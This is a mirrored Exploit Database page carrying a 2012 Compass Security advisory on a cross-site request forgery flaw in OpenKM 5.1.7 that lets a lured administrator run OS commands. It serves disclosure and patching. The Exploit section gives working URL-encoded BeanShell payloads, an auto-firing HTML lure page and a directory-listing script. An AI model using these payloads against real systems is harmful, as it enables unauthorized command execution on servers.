OpenKM Document Management System 5.1.7 – Command Execution

• Exploit Database
• 41 阅读

• 作者： Cyrill Brunschwiler
  日期： 2012-01-03
• 类别：

  • webapps
  平台：

  • jsp
• 来源：https://www.exploit-db.com/exploits/18888/

• ########################################################################
  ##
  #
  # COMPASS SECURITY ADVISORY http://www.csnc.ch/ 
  ########################################################################
  ##
  #
  # ID:COMPASS-2012-002
  # Product: OpenKM Document Management System 5.1.7 [1]
  # Vendor:OpenKM http://www.openkm.com/
  # Subject: Cross-site Request Forgery based OS Command Execution
  # Risk:High
  # Effect:Remotely exploitable
  # Author:Cyrill Brunschwiler (cyrill.brunschwiler@csnc.ch)
  # Date:January 2nd 2012
  #
  ########################################################################
  ##
  
  Description:
  ------------
  Cyrill Brunschwiler, Security Analyst at Compass Security Network
  Computing,
  Switzerland discovered a web application issue based OS command
  execution flaw
  in the OpenKM solution. OpenKM does allow administrative users (having
  the
  AdminRole) to run bean shell scripts. Due to the flaw, an attacker could
  lure
  an OpenKM administrator to a malicious web page that causes arbitrary OS
  commands being run in the administrators OpenKM session context. This is
  possible because OpenKM does not implement access control mechanisms to
  avoid
  so called Cross-site Request Forgery [2] (a.k.a. CSRF, XSRF, session
  riding,
  forceful browsing). The commands are being executed silently. In the
  end, this
  allows an attacker to run OS commands with the privileges of the process
  owner
  of the application server (JBOSS).
  
  Vulnerable:
  -----------
  OpenKM version 5.1.7
  
  Not vulnerable:
  ---------------
  OpenKM version 5.1.8
  
  Fix:
  ----
  To avoid this issue the application must introduce Anti-XSRF tokens for
  the
  web-based administrative interface. To avoid arbitrary command execution
  the
  admin/scripting.jsp could be removed from the OpenKM.ear before the
  application is being deployed. Note, the cron job functionality allows
  to run
  *.jar and BeanShell scripts as well.
  
  Exploit:
  --------
  Login as administrator (having the AdminRole) and call the URL in a
  different
  browser window
  http://example.com/OpenKM/admin/scripting.jsp?script=String%5B%5D+cmd+%3
  D+%7B%22%2Fbin%2Fsh%22%2C+%22-c%22%2C+%22%2Fbin%2Fecho+pwned+%3E+%2Ftmp%
  2Fpoc%22%7D%3B%0D%0ARuntime.getRuntime%28%29.exec%28cmd%29%3B
  
  Alternatively the administrator could browse a prepared HTML page in a
  new tab
  <html>
  <body>
  <script>
  img = new Image();
  img.src="http://example.com/OpenKM/admin/scripting.jsp?script=String%5B%
  5D+cmd+%3D+%7B%22%2Fbin%2Fsh%22%2C+%22-c%22%2C+%22%2Fbin%2Fecho+pwned+%3
  E+%2Ftmp%2Fpoc%22%7D%3B%0D%0ARuntime.getRuntime%28%29.exec%28cmd%29%3B"
  </script>
  </body>
  </html>
  
  The above exploit does nothing else than just creating a file in /tmp
  
  String[] cmd = {"/bin/sh", "-c", "/bin/echo pwned > /tmp/poc"};
  Runtime.getRuntime().exec(cmd);
  
  Some might also want to browse directories
  http://example.com/OpenKM/admin/scripting.jsp?script=import+java.io.*%3B
  %0D%0A%0D%0Atry+%7B%0D%0A++++String+ls_str%3B%0D%0A++++Process+ls_proc+%
  3D+Runtime.getRuntime%28%29.exec%28%22%2Fbin%2Fls+-lah%22%29%3B%0D%0A+++
  +DataInputStream+ls_in+%3D+new+DataInputStream%28ls_proc.getInputStream%
  28%29%29%3B%0D%0A%0D%0A++++while+%28%28ls_str+%3D+ls_in.readLine%28%29%2
  9+%21%3D+null%29+++++++++++%0D%0A++++++++print%28ls_str+%2B+%22%3Cbr%3E%
  22%29%3B%0D%0A%0D%0A%7D+catch+%28IOException+e%29+%7B%0D%0A%7D
  
  import java.io.*;
  
  try {
  String ls_str;
  Process ls_proc = Runtime.getRuntime().exec("/bin/ls -lah");
  DataInputStream ls_in = new
  DataInputStream(ls_proc.getInputStream());
  
  while ((ls_str = ls_in.readLine()) != null) 
  print(ls_str + "<br>");
  
  } catch (IOException e) {
  }
  
  Timeline:
  ---------
  August 6th, Vulnerability discovered
  August 9th, Vendor contacted
  August 10th, Vendor notified
  December 1st, Patched version released
  January 2nd, Advisory released
  
  References:
  -----------
  [1] OpenKM http://www.openkm.com/
  is an Free/Libre document management system that provides a web
  interface for
  managing arbitrary files. OpenKM includes a content repository, Lucene
  indexing, and jBPM workflow. The OpenKM system was developed using Java
  technology.
  
  [2] Cross-site Request Forgery
  https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
  CSRF is an attack which forces an end user to execute unwanted actions
  on a
  web application in which he/she is currently authenticated. With a
  little help
  of social engineering (like sending a link via email/chat), an attacker
  may
  force the users of a web application to execute actions of the
  attacker's
  choosing. A successful CSRF exploit can compromise end user data and
  operation
  in case of normal user. If the targeted end user is the administrator
  account,
  this can compromise the entire web application.